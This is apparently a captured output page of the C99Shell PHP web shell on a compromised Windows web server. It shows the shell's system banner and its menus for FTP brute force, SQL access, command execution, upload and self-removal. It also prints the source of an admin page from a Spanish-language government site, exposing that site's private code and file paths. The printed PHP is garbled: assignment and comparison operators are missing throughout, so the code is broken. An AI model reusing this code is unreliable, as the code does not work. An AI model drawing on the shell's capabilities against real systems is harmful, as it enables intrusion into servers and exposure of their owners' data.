!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\copia nuevo\htdocs\BLA\admin\usuarios\admin\   drwxrwxrwx
Free 1.09 GB of 239.26 GB (0.46%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     admin1.php (7.31 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Admin.php
 *
 * This is the Admin Center page. Only administrators
 * are allowed to view this page. This page displays the
 * database table of users and banned users. Admins can
 * choose to delete specific users, delete inactive users,
 * ban users, update user levels, etc.
 *
 * Written by: Jpmaster77 a.k.a. The Grandmaster of C++ (GMC)
 * Last Updated: August 26, 2004
 */
include("../include/session.php");

/**
 * displayUsers - Displays the users database table in
 * a nicely formatted html table.
 */
function displayUsers(){
   global 
$database;
   
$q "SELECT username,userlevel,email,timestamp "
       
."FROM ".TBL_USERS." ORDER BY userlevel DESC,username";
   
$result $database->query($q);
   
/* Error occurred, return given name by default */
   
$num_rows mysql_numrows($result);
   if(!
$result || ($num_rows 0)){
      echo 
"Error displaying info";
      return;
   }
   if(
$num_rows == 0){
      echo 
"Database table empty";
      return;
   }
   
/* Display table contents */
   
echo "<table align=\"left\" border=\"1\" cellspacing=\"0\" cellpadding=\"3\">\n";
   echo 
"<tr><td><b>USUARIO</b></td><td><b>NIVEL</b></td><td><b>EMAIL</b></td><td><b>ULTIMO INGRESO</b></td></tr>\n";
   for(
$i=0$i<$num_rows$i++){
      
$uname  mysql_result($result,$i,"username");
      
$ulevel mysql_result($result,$i,"userlevel");
      
$email  mysql_result($result,$i,"email");
      
$time   mysql_result($result,$i,"timestamp");

      echo 
"<tr><td>$uname</td><td>$ulevel</td><td>$email</td><td>$time</td></tr>\n";
   }
   echo 
"</table><br>\n";
}

/**
 * displayBannedUsers - Displays the banned users
 * database table in a nicely formatted html table.
 */
function displayBannedUsers(){
   global 
$database;
   
$q "SELECT username,timestamp "
       
."FROM ".TBL_BANNED_USERS." ORDER BY username";
   
$result $database->query($q);
   
/* Error occurred, return given name by default */
   
$num_rows mysql_numrows($result);
   if(!
$result || ($num_rows 0)){
      echo 
"Error Mostrando la información";
      return;
   }
   if(
$num_rows == 0){
      echo 
"Tabla de Base de Datos Vacia";
      return;
   }
   
/* Display table contents */
   
echo "<table align=\"left\" border=\"1\" cellspacing=\"0\" cellpadding=\"3\">\n";
   echo 
"<tr><td><b>Username</b></td><td><b>Time Banned</b></td></tr>\n";
   for(
$i=0$i<$num_rows$i++){
      
$uname mysql_result($result,$i,"username");
      
$time  mysql_result($result,$i,"timestamp");

      echo 
"<tr><td>$uname</td><td>$time</td></tr>\n";
   }
   echo 
"</table><br>\n";
}
   
/**
 * User not an administrator, redirect to main page
 * automatically.
 */
if(!$session->isAdmin()){
   
header("Location: ../index.php");
}
else{
/**
 * Administrator is viewing page, so display all
 * forms.
 */
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="noI firefox" xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Editar Cuenta</title>
<!-- Meta Tags -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- CSS -->
<link rel="stylesheet" href="../../css/dynamic.css" type="text/css">
<link rel="stylesheet" href="../../css/creation.css" type="text/css">
</head><body id="creation">

<div id="container" class="clearfix">

<img src="../../images/sidePlan1.png" alt="" name="sidePlan" width="201" height="479" id="sidePlan">

<div id="nav">
<h1 class="logo color1"><a title="Editar cuenta de Usuario">Wufoo</a></h1>
</div>


<form action="adminprocess.php" method="post" name="payment" class="wufoo leftLabel plan1" id="payment">

<ul class="fundamentals">
<li class="first section">
<h3>Centro Administración: Usuario<b>!</h3>
<div>
  <?php
if($form->num_errors 0){
   echo 
"<font size=\"4\" color=\"#ff0000\">"
       
."!*** Error with request, please fix</font><br><br>";
}
?>
</div>
</li>
<li class="complex">
<label class="desc" for="email">Listado de Usuarios <strong>Listado de Usuarios activos.</strong></label>
<div><?php
displayUsers
();
?></div>
</li>
<?php echo $form->error("upduser"); ?>
<li class="complex">
<label class="desc" for="email">Nivel Usuario<span class="req"></span>
<strong>Digita el nombre del usuario.</strong></label>
<div>
<span class="left">
<input name="upduser" type="text" class="field text addr" id="password" maxlength="32" value="<?php echo $form->value("upduser"); ?>">
<label>Usuario</label>
</span>
<span class="left">
<select name="updlevel" class="select">
<option value="1">1
<option value="9">9
</select>
<label>Nivel</label>
</span>
<span class="left">
<input type="hidden" name="subupdlevel" value="1">
<input type="submit" value="Actualizar Nivel">
<label></label>
</span></div>
</li>
<?php echo $form->error("deluser"); ?>
<li class="complex">
<label class="desc" for="password">
Borrar usuario<strong>Digita el nombre del usuario.</strong></label>
<div>
<span class="left">
<input type="text" name="deluser" class="field text addr" id="password" maxlength="32" value="<?php echo $form->value("deluser"); ?>">
<label>Usuario</label>
</span>
<span class="left">
<input type="hidden" name="subdeluser" value="1">
<input type="submit" value="Borrar Usuarios">
<label></label>
</span></div>
</li>
<li class="complex">
<label class="desc" for="password">
Borrar usuarios Inactivos<strong>Digita el password nuevo.</strong></label>
<div>
<span class="left">
<select name="inactdays">
<option value="3">3
<option value="7">7
<option value="14">14
<option value="30">30
<option value="100">100
<option value="365">365
</select>

<label>Dias</label>
</span><span class="left">
<input type="hidden" name="subdelinact" value="1">
<input type="submit" value="Borrar Usuarios Inactivos">
<label></label>
</span></div>
</li>
<?php echo $form->error("banuser"); ?>
<li class="complex">
<label class="desc" for="password">
Usuarios Suspendidos<strong>Digita el nombre del usuario.</strong></label>
<div>
<span class="left">
<input type="text" class="field text addr" name="banuser" maxlength="30" value="<?php echo $form->value("banuser"); ?>">
<label>Usuario.</label>
</span>
<span class="left">
<input type="hidden" name="subbanuser" value="1">
<input type="submit" value="Suspender Usuario">
<label></label>
</span></div>
</li>
<li class="complex">
<label class="desc" for="email">Banned Users Table Contents:<strong>Digita el password actual .</strong></label>
<div><?php
displayBannedUsers
();
?></div>
</li>
<?php echo $form->error("delbanuser"); ?>
<li class="complex">
<label class="desc" for="password">Borrar Usuarios suspendidos :<strong>Digita el password nuevo.</strong></label>
<div>
<span class="left">
<input type="text" name="banuser" maxlength="30" class="field text addr" value="<?php echo $form->value("delbanuser"); ?>">
<label>Maximo <b>32</b> caracteres de largo.</label>
</span><span class="left">
<input type="hidden" name="subdelbanned" value="1">

<label></label>
</span></div>
</li>
</ul>
<!--paymentSummary-->
</form>

<div class="footer">
<i class="c1">·</i> 
Copyright © 2010 
<i class="c1">·</i><strong>Secretaria de Ambiente </strong><b>.</b> 
<i class="c1">·</i>Todos los derechos reservados <i class="c1">·</i></div>

</div><!--container-->


</body></html>
<?php
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--